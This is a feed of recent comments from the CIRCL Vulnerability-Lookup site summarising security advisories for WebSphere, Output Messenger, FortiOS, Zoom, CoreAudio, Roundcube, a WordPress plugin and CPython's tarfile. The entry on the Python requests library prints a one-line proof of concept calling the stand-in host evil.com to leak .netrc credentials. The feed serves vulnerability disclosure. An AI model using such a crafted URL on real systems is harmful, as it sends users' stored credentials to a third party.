https://cve.circl.lu/comments/feed 2025-07-08T09:01:28.160297+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent comments. https://cve.circl.lu/comment/62e17ecb-0345-4b1c-b7d6-343410dd1084 2025-07-08T09:01:28.177164+00:00 Hans-Petter Fjeld http://cvepremium.circl.lu/user/atluxity **Abstract** IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1) **Download Description** PH65941 resolves the following problem: ERROR DESCRIPTION: IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1) PROBLEM SUMMARY: IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1) PROBLEM CONCLUSION: Confidential for CVE-2025-27907. The fix for this APAR is targeted for inclusion in 8.5.5.28, 9.0.5.24. For more information, see Recommended Updates for WebSphere Application Server: https://www.ibm.com/support/pages/node/715553 **Prerequisites** None **Problems Solved** PH65941 Source: https://www.ibm.com/support/pages/node/7231182 2025-04-23T08:25:20.348540+00:00 https://cve.circl.lu/comment/a79b754d-9252-4580-8912-42f39c854661 2025-07-08T09:01:28.177040+00:00 Patrick Boulvin http://cvepremium.circl.lu/user/Belspo Microsoft discovered critical vulnerability CVE-2025-27920 affecting the messaging application Output Messenger. Microsoft additionally observed exploitation of the vulnerability since April 2024. According to Microsoft, the attacker needs to be authenticated, although the Output Messenger advisory indicates that privileges are not required to exploit the vulnerability. An attacker could upload malicious files into the server’s startup directory by exploiting this directory traversal vulnerability. This allows an attacker to gain indiscriminate access to the communications of every user, steal sensitive data and impersonate users, possibly leading to operational disruptions, unauthorized access to internal systems, and widespread credential compromise. 2025-05-14T08:54:41.802843+00:00 https://cve.circl.lu/comment/48d3bc1d-ce6b-4a0d-93f6-aec07945969d 2025-07-08T09:01:28.176915+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric ### Risks FortiOS, FortiProxy, and FortiSwitchManager are core components of Fortinet’s network security and management infrastructure, which provide firewalling, proxy services, and centralized switch management. CVE-2025-22252 is a missing authentication vulnerability that allows an unauthenticated attacker with knowledge of an existing admin account to access the device as a valid admin. Exploitation of this flaw could grant attackers unauthorized control over network infrastructure, threatening confidentiality through data exposure, integrity via configuration tampering, and availability by disrupting critical services. ### Description CVE-2025-22252 is a missing authentication for critical function vulnerability in devices configured to use a remote TACACS+ server for authentication configured to use ASCII authentication. It may allow an attacker with knowledge of an existing admin account to access the device as a valid admin via an authentication bypass, potentially resulting in complete system compromise, data theft and service disruption. 2025-05-15T12:16:29.052130+00:00 https://cve.circl.lu/comment/eff35358-2a58-408d-8c52-0b1143adc25c 2025-07-08T09:01:28.176791+00:00 Patrick Boulvin http://cvepremium.circl.lu/user/Belspo Description In its security release of 13 May 2025, Zoom addressed two vulnerabilities that could be exploited for privilege escalation: • CVE-2025-30663, a time-of-check time-of-use race condition affecting some Zoom Workplace Apps. If successfully exploited, an authenticated user could conduct an escalation of privilege via local access. • CVE-2025-30664 is an improper neutralization of special elements flaw affecting some Zoom Workplace Apps. Successful exploitation could allow an authenticated user to conduct an escalation of privilege via local access. 2025-05-16T07:10:54.871730+00:00 https://cve.circl.lu/comment/da6e2e7d-cb96-4560-bf1a-27df4962776e 2025-07-08T09:01:28.176655+00:00 Patrick Boulvin http://cvepremium.circl.lu/user/Belspo The vulnerabilities could be used by attackers to gain access to services and data. They can also be used to execute arbitrary commands and cause a denial of service. Confidentiality, integrity and availability are all impacted. The only solution is to upgrade immediately. 2025-05-22T07:24:41.759993+00:00 https://cve.circl.lu/comment/78842211-36a0-4523-9e9a-ea14c1b05b21 2025-07-08T09:01:28.176510+00:00 Alexandre Dulaunoy http://cvepremium.circl.lu/user/adulau On April 16, 2025, Apple released a patch for a bug in CoreAudio which they said was “Actively exploited in the wild.” This flew under the radar a bit. Epsilon’s blog has a great writeup of the other bug that was presumably exploited in this chain: a bug in RPAC. The only thing out there that I am aware of about the CoreAudio side of the bug is a video by Billy Ellis (it’s great. I’m featured. You should watch…you’re probably here from that anyways). As he mentioned in the video, “Another security researcher by the name of ‘Noah’ was able to tweak the values such that when it was played on MacOS, it actually did lead to a crash.” I think it’s still worth it to write about that ‘tweaking’ process in more detail. I had just finished another project and ended up on a spreadsheet maintained by Project Zero which tracks zero days that have been actively exploited in the wild. It just so happened that that day there had been another addition: CVE-2025-31200. I couldn’t find any writeups on it, or really any information other than the fact that it was a “memory corruption in CoreAudio” so I decided to have a look myself. How hard could it be? For more details - [https://blog.noahhw.dev/posts/cve-2025-31200/](https://blog.noahhw.dev/posts/cve-2025-31200/]) 2025-06-02T20:43:39.581242+00:00 https://cve.circl.lu/comment/a5ae6fa3-504b-4d03-a153-b9f12f911f71 2025-07-08T09:01:28.176319+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: ` requests.get('http://example.com:@evil.com/')` Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue. As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access. 2025-06-04T05:03:44.190775+00:00 https://cve.circl.lu/comment/eaca75c8-db5f-490c-a54a-c24729db5728 2025-07-08T09:01:28.173583+00:00 Cédric Bonhomme http://cvepremium.circl.lu/user/cedric This template looks at the HTML body for the rcversion value and then matches on vulnerable versions. Here is a mapping of the RAW HTML value and version mapping for Roundcube: * 10502 1.5.2 * 10601 1.6.1 * 10506 1.5.6 * 10500 1.5.0 * 10609 1.6.9 * 10611 1.6.11 * 10510 1.5.10 * 10505 1.5.5 * 10503 1.5.3 * 10610 1.6.10 * 10509 1.5.9 * 10607 1.6.7 * 10602 1.6.2 * 10606 1.6.6 * 10605 1.6.5 [More information](https://github.com/rxerium/CVE-2025-49113). 2025-06-04T13:24:17.697301+00:00 https://cve.circl.lu/comment/aaaf84c7-8007-4de5-b99f-ae9a91d6e26d 2025-07-08T09:01:28.170646+00:00 Alexandre Dulaunoy http://cvepremium.circl.lu/user/adulau " This can be abused by a malicious actor to perform action which normally should only be able to be executed by higher privileged users. These actions might allow the malicious actor to gain admin access to the website. " as mentioned in https://patchstack.com/database/wordpress/plugin/payu-india/vulnerability/wordpress-payu-india-plugin-3-8-5-account-takeover-vulnerability?_s_id=cve 2025-06-11T12:34:29.562531+00:00 https://cve.circl.lu/comment/85c55b2b-8a7a-4d34-89ec-52e38ed8903c 2025-07-08T09:01:28.167239+00:00 Patrick Boulvin http://cvepremium.circl.lu/user/Belspo RISK : Multiple vulnerabilities affect the standard TarFile library for CPython. Currently, there is no indication that the vulnerability is actively exploited, but because it is a zero-day with a substantial install base, attackers can exploit it at any moment. An attacker could exploit flaws to bypass safety checks when extracting compressed files, allowing them to write files outside intended directories, create malicious links, or tamper with system files even when protections are supposedly enabled. Successful exploitation could lead to unauthorised access, data corruption, or malware installation, especially if your systems or third-party tools handle untrusted file uploads or archives RECOMMENDED ACTION: Patch Source: ccb.be 2025-06-25T13:07:32.040392+00:00